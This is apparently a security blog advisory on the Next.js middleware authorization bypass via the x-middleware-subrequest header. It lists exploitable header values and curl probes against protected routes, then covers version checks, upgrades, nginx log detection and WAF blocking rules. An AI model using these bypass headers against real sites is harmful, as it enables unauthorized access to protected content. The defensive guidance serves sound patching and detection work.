The Next.js middleware allows you to run code before a request is completed. Based on the incoming request, you can modify the response by rewriting, redirecting, modifying headers, or responding directly.
Vulnerability Details
Next.js uses an internal header, `x-middleware-subrequest`, to mark requests that middleware itself issues (for example when it rewrites or fetches), so that the middleware is not run again on them and recurse forever. In the affected versions the server did not distinguish an internally generated copy of this header from one supplied by an external client: a request that arrived with the right value was treated as a subrequest and middleware was skipped entirely. Any check that lived only in middleware, such as validating an authorization cookie before serving a protected route, could therefore be bypassed by adding a single header. Deployments behind an edge that already strips the header were not exposed; self-hosted applications that depend on middleware alone for authorization are the ones at risk.
Patched Versions:
- Next.js 15.2.3 or higher
- Next.js 14.2.25 or higher
- Next.js 13.5.9 or higher
Exploitable Headers:
- `x-middleware-subrequest: middleware`
- `x-middleware-subrequest: src/middleware`
- `x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware`
- `x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware`
The value has to match the name of the middleware module: `middleware` when `middleware.ts` (or `.js`) sits in the project root, `src/middleware` when it sits under `src/`. The single-name forms are the ones that apply to the 13.x and 14.x lines; the 15.x line counts how many times the name appears and only skips middleware once that count reaches its recursion limit, which is why the five-fold variants exist. Try all four when the layout of the target is unknown.
Nuclei Template: GitHub/Nuclei-Templates
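To make the header list above concrete, here is an added example (not Next.js source code) that models the decision the affected server made when it saw `x-middleware-subrequest`, the different behaviour of the 15.x line, and what a patched release does with the header. The constant `MAX_RECURSION_DEPTH`, the `line` switch and the toy `authMiddleware` are assumptions made for illustration.

```javascript
// Added example, not Next.js source: simplified model of the middleware-skip decision.
const HEADER = 'x-middleware-subrequest';
const MAX_RECURSION_DEPTH = 5; // assumed depth limit of the 15.x line

// Affected 13.x/14.x style check (assumed): skip middleware if its module name
// appears anywhere in the colon-separated header value.
function skipsMiddlewareByName(headerValue, middlewareName) {
  if (!headerValue) return false;
  return headerValue.split(':').includes(middlewareName);
}

// Affected 15.x style check (assumed): count occurrences of the module name and
// skip only once the recursion limit is reached, hence the five-fold payloads.
function skipsMiddlewareByDepth(headerValue, middlewareName) {
  if (!headerValue) return false;
  const depth = headerValue.split(':').filter((p) => p === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// The application's own middleware: redirect to /login unless a session cookie exists.
function authMiddleware(req) {
  if (!req.cookies.session) {
    return { status: 307, location: '/login' };
  }
  return null; // fall through to the route
}

// One request through the modelled server. `line` selects which affected check applies;
// `patched` models a fixed release, which drops the client-supplied header on ingress.
function handleRequest({ headers = {}, cookies = {}, middlewareName = 'middleware', line = '14', patched = false }) {
  const incoming = { ...headers };
  if (patched) delete incoming[HEADER]; // patched: external copies of the header are ignored

  const value = incoming[HEADER];
  const skip = line === '15'
    ? skipsMiddlewareByDepth(value, middlewareName)
    : skipsMiddlewareByName(value, middlewareName);

  if (!skip) {
    const verdict = authMiddleware({ cookies });
    if (verdict) return { middlewareRan: true, ...verdict };
    return { middlewareRan: true, status: 200 };
  }
  // Middleware skipped: the protected route renders for an unauthenticated caller.
  return { middlewareRan: false, status: 200 };
}
```

The model makes two points visible: the header value is only useful if it names the module that actually exists in the target (`middleware` against a `src/middleware` project does nothing), and on the 15.x line a single name is below the recursion limit, so the five-fold value is required.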
You Should Know:
#### **1. Testing the Vulnerability with cURL**
Take a baseline first, then repeat the request with the header and compare status codes and bodies:
```bash
# Baseline: an unauthenticated request to a route guarded by middleware
curl -i http://vulnerable-nextjs-site.com/protected-route
# Same request with the bypass header
curl -i -H "x-middleware-subrequest: middleware" http://vulnerable-nextjs-site.com/protected-route
```
On an affected version the baseline typically returns the middleware's redirect to the login page (a 3xx with a `Location` header) or a 401/403, while the second request returns 200 with the protected content. Repeat with `src/middleware` and the five-fold variants if the first value has no effect.
#### **2. Detecting Vulnerable Next.js Versions**
Next.js does not reveal its version in responses. Unless `poweredByHeader: false` is set in `next.config.js`, it sends `X-Powered-By: Next.js`, which only identifies the framework:
```bash
nmap -sV --script http-headers <target-ip> | grep -i "Next.js"
```
To learn the actual version you need access to the deployment: check `node_modules/next/package.json` or the lockfile, or run `npm list next` in the project, and compare the result with the patched releases above.
#### **3. Mitigation Steps**
- Update Next.js. `npm update next` only moves within the semver range declared in `package.json`, so pin an explicit patched release for the line you are on:
```bash
npm install next@14.2.25   # or next@15.2.3 / next@13.5.9
```
- Do not rely on a check inside the middleware itself. On an affected version, a request carrying a matching `x-middleware-subrequest` value never reaches the middleware, so code like the following never runs for the exploit request; on a patched version the server removes the header before middleware sees it, so the branch is dead there too:
```javascript
export function middleware(req) {
  // Ineffective against the bypass: on affected versions this function is skipped
  // when the header is present, and patched versions strip the header first.
  if (req.headers.get('x-middleware-subrequest')) {
    return new Response('Middleware Bypass Attempt Blocked', { status: 403 });
  }
  // Proceed with auth checks
}
```
  If you cannot upgrade immediately, strip or reject the header at the reverse proxy or WAF in front of the application (see step 5), and enforce authorization again in route handlers, server actions and the data layer rather than in middleware alone.
#### **4. Logging Suspicious Requests**
The default nginx `combined` format does not record custom request headers, so a plain grep of the access log finds nothing. Add the header to a log format first, then watch for it:
```nginx
log_format mwsub '$remote_addr - [$time_local] "$request" $status "$http_x_middleware_subrequest"';
access_log /var/log/nginx/access.log mwsub;
```
```bash
# Linux log monitoring: legitimate clients never send this header, so any hit is worth investigating
tail -f /var/log/nginx/access.log | grep -i "middleware"
```
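As an added example of turning that log into an alert (not part of the original post), the script below parses an nginx access log written with the assumed custom format `'$remote_addr - [$time_local] "$request" $status "$http_x_middleware_subrequest"'`, flags every request that carried the header, and summarises per source address. The log lines are constructed for the example; the 2xx-means-success heuristic is an assumption for triage, not proof of compromise.

```javascript
// Added example, not from the original post: detection over a custom-format nginx log.
// Constructed sample log; the last line checks that malformed input is skipped, not crashed on.
const SAMPLE_LOG = [
  '203.0.113.5 - [24/Mar/2025:10:01:02 +0000] "GET /admin HTTP/1.1" 307 "middleware"',
  '203.0.113.5 - [24/Mar/2025:10:01:03 +0000] "GET /admin HTTP/1.1" 200 "middleware:middleware:middleware:middleware:middleware"',
  '198.51.100.7 - [24/Mar/2025:10:02:10 +0000] "GET /login HTTP/1.1" 200 "-"',
  '192.0.2.9 - [24/Mar/2025:10:03:44 +0000] "GET /api/user HTTP/1.1" 200 "src/middleware"',
  'garbage line that does not match the format',
].join('\n');

// Matches: ip - [time] "METHOD path PROTO" status "header-value-or-dash"
const LINE_RE = /^(\S+) - \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) "([^"]*)"$/;

// Parse one line; returns null for lines that do not match the expected format.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, path, status, subrequest] = m;
  return {
    ip, time, method, path,
    status: Number(status),
    subrequest: subrequest === '-' ? null : subrequest, // nginx logs "-" for an absent header
  };
}

// External clients never legitimately send this header, so every non-empty value is a hit.
// A 2xx on the hit suggests the bypass worked (assumption); a redirect or 4xx suggests it
// was blocked, or the target was already patched.
function findBypassAttempts(logText) {
  return logText
    .split('\n')
    .map(parseLine)
    .filter((e) => e && e.subrequest !== null)
    .map((e) => ({ ...e, likelySuccess: e.status >= 200 && e.status < 300 }));
}

// Per-source summary for triage: attempts, distinct paths, and whether any appeared to succeed.
function summarizeBySource(attempts) {
  const out = {};
  for (const a of attempts) {
    const s = out[a.ip] || (out[a.ip] = { attempts: 0, paths: new Set(), likelySuccess: false });
    s.attempts += 1;
    s.paths.add(a.path);
    s.likelySuccess = s.likelySuccess || a.likelySuccess;
  }
  return Object.fromEntries(
    Object.entries(out).map(([ip, s]) => [ip, { ...s, paths: [...s.paths] }]),
  );
}
```

Run it over a real log with `findBypassAttempts(fs.readFileSync(path, 'utf8'))`; the two hits from `203.0.113.5` in the sample show the typical pattern of a single-name probe followed by the five-fold value once the first one was redirected.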
#### **5. Using WAF Rules to Block Exploits**
For **NGINX**, reject any request that arrives from outside with the header set (no legitimate client sends it); alternatively clear the header before proxying instead of rejecting:
```nginx
location / {
    if ($http_x_middleware_subrequest) {
        return 403;
    }
    proxy_pass http://nextjs_upstream;   # upstream name is a placeholder
}
```
For **Cloudflare**, create a WAF custom rule that blocks requests in which the `x-middleware-subrequest` request header is present, for example with the expression `len(http.request.headers["x-middleware-subrequest"]) > 0`.
### **What Undercode Says:**
This vulnerability highlights the importance of not treating internal framework headers as trustworthy when they arrive from the network, and of not making middleware the only authorization check in a Next.js application. Attackers can skip security checks by supplying one internal header, leading to unauthorized access. Always:
– Keep frameworks updated.
– Strip or reject internal headers such as `x-middleware-subrequest` at the edge, before they reach the application.
– Enforce authorization in route handlers and the data layer as well as in middleware.
– Monitor logs for unusual headers.
– Use WAF rules for additional protection.
**Relevant Commands Recap:**
```bash
# Check Next.js version
npm list next
# Test middleware bypass
curl -i -H "x-middleware-subrequest: middleware" http://target.com/admin
# Monitor logs (the log format must include $http_x_middleware_subrequest)
grep "middleware" /var/log/web-traffic.log
```
**Expected Output:**
A patched Next.js application runs its middleware regardless of the header and answers the unauthenticated probe the same way it answers the baseline request (typically a redirect to login or a 401/403). Where an edge rule from step 5 is in place, the request is rejected with 403 Forbidden before it reaches the application.
Reported By: Saurabh B294b21aa – Hackers Feeds